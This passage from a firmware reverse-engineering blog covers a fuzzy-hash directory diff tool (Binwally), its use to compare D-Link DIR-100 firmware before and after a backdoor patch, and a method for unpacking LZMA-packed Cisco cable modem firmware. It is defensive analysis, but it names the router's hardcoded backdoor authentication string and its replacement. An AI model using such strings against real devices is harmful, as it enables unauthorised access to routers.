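    """Constructed sample: two fake 'extracted firmware' roots in a temp dir;
    names only echo the post, every byte is synthetic (deterministic SHA-256)."""
    base = tempfile.mkdtemp(prefix="binwally_")
    old, new = os.path.join(base, "fw_1.13"), os.path.join(base, "fw_1.14")
    blob = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
    files = {
        "bin/busybox": (blob, blob),                                 # identical
        "bin/pppd": (blob, blob[:2000] + b"PATCHED" + blob[2000:]),  # small edit
        "bin/webs": (blob, blob[::-1]),                              # rebuilt
        "etc/watchdog.sh": (None, b"#!/bin/sh\nexec /bin/httpd\n"),  # added
        "etc/old.conf": (b"legacy=1\n", None),                       # removed
    }
    for rel, contents in files.items():
        for root, content in zip((old, new), contents):
            if content is not None:
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "wb") as f:
                    f.write(content)
    return old, new
```

Running diff_trees() over the two sample roots reports the identical file as a match, the 7-byte insertion as a high but not necessarily perfect score, and the rebuilt binary as 0 because no run of seven signature characters survives.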
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvychPvCQhdnJs9n5O71TD8HjKRHpFbWvgfbnZjQGz8AglOqu1mYXTisAeUQucyUbZTf3cgdQsSpKTx7PJIFgEXQTPzTal3NXdrhbQqXGiPmp1a048jHuuPh_2f3kFdDRio4FcX8YzkTo/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvychPvCQhdnJs9n5O71TD8HjKRHpFbWvgfbnZjQGz8AglOqu1mYXTisAeUQucyUbZTf3cgdQsSpKTx7PJIFgEXQTPzTal3NXdrhbQqXGiPmp1a048jHuuPh_2f3kFdDRio4FcX8YzkTo/s400/bin1.png" width="400" /></a></div>
<br />
Comparing two directory trees from a firmware unsquashed using Binwalk and firmware-mod-kit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1v6lFpNffqSy-eOf28m94S6vv2I90164ViYU9XtZyklln4zs3FgT1a33LB5szyECnYBgZcxH1yI0gk0IC1R1CmDk8K0CzHZ-I_jOslnPKVhfDmLxfvuerOh06OD64VG3RRcMfqeeCppqL/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1v6lFpNffqSy-eOf28m94S6vv2I90164ViYU9XtZyklln4zs3FgT1a33LB5szyECnYBgZcxH1yI0gk0IC1R1CmDk8K0CzHZ-I_jOslnPKVhfDmLxfvuerOh06OD64VG3RRcMfqeeCppqL/s640/bin2.png" width="640" /></a></div>
<br />
You can already achieve this using <a href="http://winmerge.org/">WinMerge</a>, but that tool does not display a matching score, it's not command-line based and it's not scriptable. You can check my <a href="http://w00tsec.blogspot.com/2013/08/simet-box-firmware-analysis-embedded.html">previous post</a> describing how to use it to diff firmware images.<br />
<br />
Binwally is best used with <a href="https://github.com/devttys0/binwalk/">Binwalk</a>, so I'll talk to <a href="https://twitter.com/devttys0">devttys0</a> about merging it into his tool (maybe as a new command line switch under the Binary Diffing options). Binwalk already supports binary diffing (the -H switch), but it only compares whole files and firmware images. The problem is that firmware images are usually packed, encrypted and/or compressed: when you unpack them and compare the extracted files and their directory tree, you get much more valuable information. If you disassemble the code and compare the results again, you get even better data - this is what <a href="http://www.zynamics.com/bindiff.html">bindiff</a> from Zynamics/Google does pretty well. The Insinuator blog has a nice <a href="http://www.insinuator.net/2013/07/reverse-engineering-tools/">example of how to use bindiff for RE</a>.<br />
<br />
<b>Binwally Usage: Dissecting DLink Backdoor Patch</b><br />
<br />
So you may have heard recently that some DLink routers <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">had a backdoor</a> and that a <a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10001">security update</a> was issued to address the vulnerability.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpXkWUOLm8Xgjkw17ENv_AGJGOIvU_jMR2dZkn216HHRv4XfzyQMjF_7i6e0MQG5Jcu7OAgQQT8ryGQqeV3-grzdyhekxpRKj4-HDnyiQ4ugvjX9liXChfluBTvQrgmjMN4ORdETbxOEO/s1600/dlink1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpXkWUOLm8Xgjkw17ENv_AGJGOIvU_jMR2dZkn216HHRv4XfzyQMjF_7i6e0MQG5Jcu7OAgQQT8ryGQqeV3-grzdyhekxpRKj4-HDnyiQ4ugvjX9liXChfluBTvQrgmjMN4ORdETbxOEO/s320/dlink1.png" width="319" /></a></div>
According to <a href="https://www.schneier.com/">Bruce Schneier</a>, we should "Trust but verify": that's what we are going to do here. First, let's download the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip">backdoored version (v1.13)</a> and the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_revA1_114wwb02_all_en_20131112.zip">patched version (1.14)</a> from DLink's FTP. The next step is to extract the firmware images (binwalk -e DIR100A1_FW114WWB02.bix DIR100_v5.0.0EUb3_patch02.bix) and compare the directory trees using Binwally:<br />
<br />
<div class="code">
$ python binwally.py _DIR100_v5.0.0EUb3_patch02.bix.extracted/ _DIR100A1_FW114WWB02.bix.extracted/
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3j4AeDMBL0v_3RNgKsmp9GtEauxGWnmOAjuX_P2WwEVATjygKzxCAhoaIYkq93QFNox0smiarPFPYx5RWZ4WJOE4FQdRKeadZmAfWK_LxFrY8pGAcuawWmb3naEoi4dawe20DDV9-l5-/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3j4AeDMBL0v_3RNgKsmp9GtEauxGWnmOAjuX_P2WwEVATjygKzxCAhoaIYkq93QFNox0smiarPFPYx5RWZ4WJOE4FQdRKeadZmAfWK_LxFrY8pGAcuawWmb3naEoi4dawe20DDV9-l5-/s640/bin3.png" width="594" /></a></div>
<br />
I removed the matching files and symlinks for better readability, but the analysis is now narrowed to a small set of files. According to the release notes, a minor PPPoE dial-up issue was also fixed, which may be why "/bin/pppd" has differences.<br />
<br />
Some files, like "/www/Home/bsc_lan.htm", have a matching score of 100 even though they have different content (and therefore different MD5 hashes). This is due to the nature of Fuzzy Hashing: the small modification was not enough to change the fuzzy hash value. It's important to note that files with a "match" result do actually have the same content, and also have a matching score of 100.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZWI5oIskpIppTiW3KNe80TjicAuVurCTpceUilQZQXFgyKBkACFE7U5xTo9DrVqj9da9b3ZpaoBXrXIHTMlMaNPslXo2sQVAVfDkbVuv0fXoooNWV6Drizba0AnjGbC7-lx50NNJTSs2O/s1600/wingerge1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZWI5oIskpIppTiW3KNe80TjicAuVurCTpceUilQZQXFgyKBkACFE7U5xTo9DrVqj9da9b3ZpaoBXrXIHTMlMaNPslXo2sQVAVfDkbVuv0fXoooNWV6Drizba0AnjGbC7-lx50NNJTSs2O/s640/wingerge1.png" width="640" /></a></div>
<br />
There's a new Shell script on the patched 1.14 firmware, located at "/etc/wdhttp.sh". It seems that Joel "do not know how to write sash loop command ugly code":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7waULo4Mp6iu2t8SkP9OVVyRmSHyWv48TjT089sLbfA3UBegFjxZj4hKgHwsZ6Gw-eJiGS-8Dq-0cLFwCZND6b_KRiCoaWl5ObFb8RD8yPDkh4jIrA2wHPq0d-PAlN0bN2hS01N0HevH/s1600/wdhttp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji7waULo4Mp6iu2t8SkP9OVVyRmSHyWv48TjT089sLbfA3UBegFjxZj4hKgHwsZ6Gw-eJiGS-8Dq-0cLFwCZND6b_KRiCoaWl5ObFb8RD8yPDkh4jIrA2wHPq0d-PAlN0bN2hS01N0HevH/s640/wdhttp.png" width="640" /></a></div>
<br />
Busybox was another binary that had a different pattern. <a href="http://w00tsec.blogspot.com/2013/09/analyzing-and-running-binaries-from.html">Running them using QEMU</a> shows that they still have the same version (v1.0.0-pre2) and different compile dates (2011.09.15 and 2013.10.31).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZE0DOCvIN59YWPQN13eyIMvo02z6uWFxuU7O70hwEkAapEh1AAJj3gBAilVp0Yl00JE52X4L6dBBOmEe760HMNbYPq3L3_mrDbhyphenhyphenJYzsw3Rnf15hmFYwPxmcysdZdkHhQKs-Q8HKQ0c00/s1600/busy1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZE0DOCvIN59YWPQN13eyIMvo02z6uWFxuU7O70hwEkAapEh1AAJj3gBAilVp0Yl00JE52X4L6dBBOmEe760HMNbYPq3L3_mrDbhyphenhyphenJYzsw3Rnf15hmFYwPxmcysdZdkHhQKs-Q8HKQ0c00/s640/busy1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBV8lis33kdJAS6Cwg7wc3I8dsgwLNonGT2AGWXG_QElcZqHe4TzNuyaIuxJUoIjjLHX0jB9N-8Ao-1_65yytjWeyiDku6IOh4dMqGzckbDmlBAdkJhqJGH1KPRE3JPWJJVPPmseYS-a_3/s1600/busy2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBV8lis33kdJAS6Cwg7wc3I8dsgwLNonGT2AGWXG_QElcZqHe4TzNuyaIuxJUoIjjLHX0jB9N-8Ao-1_65yytjWeyiDku6IOh4dMqGzckbDmlBAdkJhqJGH1KPRE3JPWJJVPPmseYS-a_3/s640/busy2.png" width="640" /></a></div>
<br />
According to the analysis from devttys0, the binary "/bin/webs" had the backdoor function (if you did not read his analysis yet, <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">read it here</a>). Binwally returned a match score of 0 because it was unable to find similar patterns. The binaries have different sizes and were probably compiled using different toolchains, containing different offsets, as displayed on the diff from Winmerge:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjGnK6V4rq8ouEAggSNS6USCIyRXyVGDkmC8DMPSsI2ePZjXQGeE4pqwc7iYW-FmrhPIxyix24G-VvpFG1lRUZmFBSk0_OlY1oL_Dm-SP0KkZYI3Gt7sRlFr2tAvDhyzNW-H1X-o9hsF9/s1600/winmerge.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLjGnK6V4rq8ouEAggSNS6USCIyRXyVGDkmC8DMPSsI2ePZjXQGeE4pqwc7iYW-FmrhPIxyix24G-VvpFG1lRUZmFBSk0_OlY1oL_Dm-SP0KkZYI3Gt7sRlFr2tAvDhyzNW-H1X-o9hsF9/s640/winmerge.PNG" width="640" /></a></div>
<br />
Binwalk from v1.3.0 beta on <a href="http://binwalk.org/3d-data-visualizations/">displays 3D binary data visualizations</a>, so let's have a look at how they differ in a 3D plane:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-0skaGwKM5R4MbWrP0PQ5x0aztIxQupSlspJvlrSlovxVoCqXMcPulc7awiiIjga8YoFhGs3ikjficDrkBcRafUFoQtiQjxbWT3OT7SPic-0aDDLMIQGKKSo9mzW8A5IKLqNUQHasmw63/s1600/3d.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-0skaGwKM5R4MbWrP0PQ5x0aztIxQupSlspJvlrSlovxVoCqXMcPulc7awiiIjga8YoFhGs3ikjficDrkBcRafUFoQtiQjxbWT3OT7SPic-0aDDLMIQGKKSo9mzW8A5IKLqNUQHasmw63/s1600/3d.gif" /></a></div>
<br />
It's time to use an approach other than byte comparison and fuzzy hashing. Bindiff uses a graph-theoretical approach to compare executables, identifying identical and similar functions. We first need to analyze both files using IDA to create the needed IDB files. After loading both files into bindiff, we notice a high level of similarity in the call graphs:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm44_9rHMvXLMNVaBr5OhE5Ymx0HMXa1vY_5RLjefESyBgzspD8wvZPDb_PjKyh8kT__tfmusIynebEtzx3IljhhJB-QceSjBwoabwi3MIwpD7IwlCtGGNbMYUbvGPAnin45Aia6Jookt1/s1600/bindiff1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="433" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm44_9rHMvXLMNVaBr5OhE5Ymx0HMXa1vY_5RLjefESyBgzspD8wvZPDb_PjKyh8kT__tfmusIynebEtzx3IljhhJB-QceSjBwoabwi3MIwpD7IwlCtGGNbMYUbvGPAnin45Aia6Jookt1/s640/bindiff1.png" width="640" /></a></div>
<br />
Let's focus on the previously backdoored function "alpha_auth_check":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHlTh4KPz9UtnE_9B3YoDRaWwW550Zytn4s_DaQ7ZtWM2eHyR9MWqfReVDkEZWNEb8xxSp5jI_EZTZsq7V3rY9ct3hOw6IWhap75Ivpog_-lBE6mH8RUErcJPizoAP4INO7B2DOZfc_ZFN/s1600/bindiff2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHlTh4KPz9UtnE_9B3YoDRaWwW550Zytn4s_DaQ7ZtWM2eHyR9MWqfReVDkEZWNEb8xxSp5jI_EZTZsq7V3rY9ct3hOw6IWhap75Ivpog_-lBE6mH8RUErcJPizoAP4INO7B2DOZfc_ZFN/s640/bindiff2.png" width="640" /></a></div>
<br />
We can easily spot the difference displaying the flow graph:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoP0nrdXiQkVIQGM3g1UO_OdU44PYcEYCvKYLVGH59uzACKgg7fKlxE-tNF9zlM0KfYN8x6zRd-ALhBRyhNEFRVgEh5cq7BNcfzoFBnUQjuHsh6B1rRgDTaZMyN1NQqnZB5z7BROf2dJFp/s1600/bindiff3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoP0nrdXiQkVIQGM3g1UO_OdU44PYcEYCvKYLVGH59uzACKgg7fKlxE-tNF9zlM0KfYN8x6zRd-ALhBRyhNEFRVgEh5cq7BNcfzoFBnUQjuHsh6B1rRgDTaZMyN1NQqnZB5z7BROf2dJFp/s640/bindiff3.png" width="640" /></a></div>
<br />
Zooming in (courtesy of NSA):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GNxGDeuxN1qPwwPhzosz6oZmOmXt00ku2uLCIsp-SfxVvlPmJlg5fz1B_QslRGuAq6jfCvZyC00WKnP8dy6OKwIKL8wUi7pxRwQdcwY0pRbFAZgdoeAoJgPpOqt0jrTPTmNYoBLm8V2L/s1600/bindiff4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GNxGDeuxN1qPwwPhzosz6oZmOmXt00ku2uLCIsp-SfxVvlPmJlg5fz1B_QslRGuAq6jfCvZyC00WKnP8dy6OKwIKL8wUi7pxRwQdcwY0pRbFAZgdoeAoJgPpOqt0jrTPTmNYoBLm8V2L/s640/bindiff4.png" width="640" /></a></div>
<br />
<br />
It seems that Joel's "xmlset_roodkcableoj28840ybtide" is gone, say hello to "iNteLalsEtvaLuewitHoutnAme". And yes, it seems that Joel (and the binaries that can re-configure the device's settings) can only access the device from 127.0.0.1 now =)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBU5drSMUz_Hmw4MWbAsRX2S2shAkJm4vuk2TZ3oBIom8sOvqZA9LXY1dCdjNO3mO2igPaqjxJykQCbCE5w_QQKMRvG7eGdycQGTosr0qJ1XdNXSVuZW2VvnFvfNt8Sf44p_fveyhZ2cZg/s1600/bindiff5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="329" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBU5drSMUz_Hmw4MWbAsRX2S2shAkJm4vuk2TZ3oBIom8sOvqZA9LXY1dCdjNO3mO2igPaqjxJykQCbCE5w_QQKMRvG7eGdycQGTosr0qJ1XdNXSVuZW2VvnFvfNt8Sf44p_fveyhZ2cZg/s640/bindiff5.png" width="640" /></a></div>
<br />
<b>Conclusion</b><br />
<br />
Binary and directory tree diffing is a powerful tool for reverse engineering and for finding a potential compromise of a system, as long as you have a "known template". In the context of embedded systems, it reveals modified files, settings and directories, narrowing the analysis to a small set of data when analyzing different firmware images.<br />
<br />
To all the vendors out there: it's important to be transparent about what's being fixed, alerting end-users to how critical the issues are. And please, leave the backdooring job to the guys who "<a href="http://www.youtube.com/watch?v=jMUbz4u5_NQ">read the constitution</a>" and are paid for that, OK?<br />
<br />
<b>Unpacking Firmware Images from Cable Modems</b> (Bernardo Rodrigues, published 2013-11-11, updated 2014-01-08)<br />
<br />
Hacking cable modems used to be very popular during the early 2000s. People like <a href="http://books.google.com.br/books?hl=pt-BR&id=PblPcRqHM0wC">DerEngel</a> and <a href="http://isabel.la/">Isabella</a> from TCNiSO carried out lots of research on the topic, and talks by bitemytaco (R.I.P.) and BlakeSelf at <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-self.pdf">DEFCON 16</a> and <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Blake-bitemytaco/DEFCON-18-Blake-bitemytaco-Hacking-DOCSIS.pdf">DEFCON 18</a> covered lots of information on the subject.<br />
<br />
Securing cable modems is more difficult than other embedded devices because, in most cases, you can't choose your own device or firmware, and software updates are almost entirely controlled by your ISP. Most cable modems offer a limited administrative interface, and management commands are sent using SNMP.<br />
<br />
<b>Cable Modem Firmware</b><br />
<br />
There are basically three types of firmware images for cable modems:<br />
<br />
- Signed and compressed (PKCS#7 & binary)<br />
- Compressed binary images<br />
- RAM dump images (uncompressed & raw)<br />
<br />
You can dump your own firmware image using <a href="http://www.usbjtag.com/">JTAG</a> or by sniffing the connection during upgrades, for example. I'm a big fan of <a href="https://code.google.com/p/binwalk/">binwalk</a> and I always wondered why it doesn't unpack firmware images from popular Broadcom based cable modems, so I decided to research this.<br />
<br />
<b>Unpacking the Firmware</b><br />
<br />
For this analysis I'll use the <a href="http://www.cisco.com/web/consumer/support/modem_DPC3925.html">Cisco DPC3925</a>, which is a very common DOCSIS 3.0 modem here in Brazil. The Cisco DPC3925 has a <a href="http://datasheet.elcodis.com/pdf/48/45/484522/bcm3380dkfsbg.pdf">BCM3380</a> chipset with 16MB of flash and 64MB of DRAM.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9TCyYVRYu8pf0WL5-T8XXYAKP0xYGOWlWyldV3IzcYLLumgkgApH_PDSrJ6Jcl9jS3tLlqi3auHTi_Mi5t3t1Nb6H5sXmydd7HFD9ZUigPzBdHnY7IM6sO0VX6BS9duS0eMfR23ks9c5y/s1600/dpc3925.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9TCyYVRYu8pf0WL5-T8XXYAKP0xYGOWlWyldV3IzcYLLumgkgApH_PDSrJ6Jcl9jS3tLlqi3auHTi_Mi5t3t1Nb6H5sXmydd7HFD9ZUigPzBdHnY7IM6sO0VX6BS9duS0eMfR23ks9c5y/s320/dpc3925.png" height="146" width="320" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPAmsk3zRZITEC1aoiQobxfqQ8PU1GxhW7PjQiS9SdG4cF6lzRKfcMFgh3FjitHNAFbHe0RamfrbR-TzM1WxD40sGfKhqdf3Tpg5Z6jdX-SChRIX9N-bl_DeK46XrudwgvwF8hiGhz7jda/s1600/bcm3380.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPAmsk3zRZITEC1aoiQobxfqQ8PU1GxhW7PjQiS9SdG4cF6lzRKfcMFgh3FjitHNAFbHe0RamfrbR-TzM1WxD40sGfKhqdf3Tpg5Z6jdX-SChRIX9N-bl_DeK46XrudwgvwF8hiGhz7jda/s200/bcm3380.png" height="185" width="200" /></a></div>
<br />
The compressed firmware image is around 4MB. Running strings against the file didn't help much, and binwalk v1.2.1 (without any additional parameters) did not recognize it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTDqaLWjWDpLUaH9hH0QL6nkE494k0KkxcwWSwJmJgOUlzYhaf6xPknVRLT5koH910ukMeezgQcBPEQhgVDjBlN5Dpp_tZZNT3qOHr0Eo_eg1FwQ0mWSY-2Vzch1MnKYp2lDhp6h_vHmY/s1600/binwalk1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTDqaLWjWDpLUaH9hH0QL6nkE494k0KkxcwWSwJmJgOUlzYhaf6xPknVRLT5koH910ukMeezgQcBPEQhgVDjBlN5Dpp_tZZNT3qOHr0Eo_eg1FwQ0mWSY-2Vzch1MnKYp2lDhp6h_vHmY/s400/binwalk1.png" height="161" width="400" /></a></div>
<br />
We can gather lots of useful information from the vendor's page: user guides, datasheets, licensing information and the open source disclaimer for the product. There are no sources available on Cisco's site, but the <a href="http://www.cisco.com/en/US/docs/video/at_home/Cable_Modems/3000_Series/7022138_A.pdf">Copyright Notices section</a> states that the product uses LZMA SDK 4.21.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwOser0UIJ88_adWomXWPGlbOdBufbeqYnjp21CDAQaEBuw9uj1mmuo3vRbJj6sg8sINUCLN5e2zypSFu2NhIMW-eDdtM6uAAgD9PfCjSySQk8UWuCEx1D193zJIWwtpRDEIlTeiV5wQkc/s1600/firm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwOser0UIJ88_adWomXWPGlbOdBufbeqYnjp21CDAQaEBuw9uj1mmuo3vRbJj6sg8sINUCLN5e2zypSFu2NhIMW-eDdtM6uAAgD9PfCjSySQk8UWuCEx1D193zJIWwtpRDEIlTeiV5wQkc/s320/firm2.png" height="320" width="278" /></a></div>
<br />
So we know that the firmware is probably packed using LZMA, but we still need to figure out how to unpack it. binwalk -i displays results that were marked as invalid during the scan, which might give us a clue:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUfwMMWUvPesuUV75vDWmvRXOhQE_aeMxH1N0CYF4oWufUnO4OsR-JgfwqVQRSSeuZg-lnsrbfgSbc0ZWzHqwSzIbRA79gM2thW5UZ6aiKnii9gTj8Mjovy67U9atY3EcDOnspuBFSWec2/s1600/binwalk2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUfwMMWUvPesuUV75vDWmvRXOhQE_aeMxH1N0CYF4oWufUnO4OsR-JgfwqVQRSSeuZg-lnsrbfgSbc0ZWzHqwSzIbRA79gM2thW5UZ6aiKnii9gTj8Mjovy67U9atY3EcDOnspuBFSWec2/s400/binwalk2.png" height="187" width="400" /></a></div>
<div>
<br /></div>
<div>
The LZMA header is not well documented. There are some good resources on <a href="https://github.com/cscott/lzma-purejs/blob/master/FORMAT.md">lzma-purejs Github</a> and you can also check binwalk's <a href="https://code.google.com/p/binwalk/source/browse/trunk/src/magic/lzma">magic file signatures</a> (<a href="https://twitter.com/devttys0">devttys0</a> already did all the hard work for us).<br />
<br />
<div class="code">
Offset  Size  Description<br />
0       1     lc, lp and pb in encoded form<br />
1       4     dictSize (little endian)<br />
5       8     uncompressed size (little endian)</div>
<div>
<br /></div>
The bootloader at the beginning of the flash contains the information needed to boot the firmware image. At the top of the firmware image there's always an extractor which decompresses the firmware into DRAM.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5V9mwq4Xg8sdvZxpEkq2m5J29ewoZoMrHqz0j-TNegpsiojaUkK-iIbySuLQc-Lm5SccFKp7JYsJBUSqAKnhvryIfsBXbjOpDYXLonE5ivzgNfsgWH1zE-hbJmlPRNl622qrXRzYgDmpV/s1600/firm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5V9mwq4Xg8sdvZxpEkq2m5J29ewoZoMrHqz0j-TNegpsiojaUkK-iIbySuLQc-Lm5SccFKp7JYsJBUSqAKnhvryIfsBXbjOpDYXLonE5ivzgNfsgWH1zE-hbJmlPRNl622qrXRzYgDmpV/s400/firm1.png" height="323" width="400" /></a></div>
<br />
Offset 0x677 is a good candidate because it's located in the beginning of the file and it seems to have a valid header. 5D 00 00 00 01 indicates a LZMA compression level of -8 and the next 64 bits should be the data's uncompressed size (in little endian).</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio4rostV-utdMu65PuDoP9yXjPaU-pV3rpv7p-4gKORcEE75O5wOFVNWzu_dZahDobM7uGKcW0c4pBR8QpaJAVYRYGKTb8jpBCLhyphenhyphenHDfCfT2wusWv7qJO6PcBaEtnzZPIVQ5ncHx7DpYy1/s1600/offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio4rostV-utdMu65PuDoP9yXjPaU-pV3rpv7p-4gKORcEE75O5wOFVNWzu_dZahDobM7uGKcW0c4pBR8QpaJAVYRYGKTb8jpBCLhyphenhyphenHDfCfT2wusWv7qJO6PcBaEtnzZPIVQ5ncHx7DpYy1/s640/offset.png" height="315" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
The 64 bits following the header (00 20 20 0E 3A 28 AB EF) are clearly not a valid uncompressed size (2898643604054482944 bytes). They are the start of the actual compressed data, which is why binwalk and 7zr are unable to extract it.<br />
<br />
What we need to do here is insert a few extra bytes after the 5-byte header so our regular 7zr binary can recognize and extract the data. We don't know the uncompressed size of the firmware yet; the good news is that we can specify a big value here, allowing the 7zr utility to unpack it (although it complains that EOF was reached too early). Let's specify 268435456 bytes (256MB), convert it to little endian (00 00 00 10 00 00 00 00) and insert it after the original LZMA header. The new header should look like ... 5D 00 00 00 01 00 00 00 10 00 00 00 00 00 20 20 ...<br />
<br />
I took the opportunity to have a look at binwalk's <a href="https://code.google.com/p/binwalk/wiki/API">API</a> and wrote a simple <a href="https://github.com/bmaia/lzma-unpacker">lzma-unpacker.py</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/f095fde8cde3dcd2c74b.js"></script>
This code will probably be obsolete in a couple of days, because I'm pretty sure binwalk will incorporate this (a plugin, maybe?)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
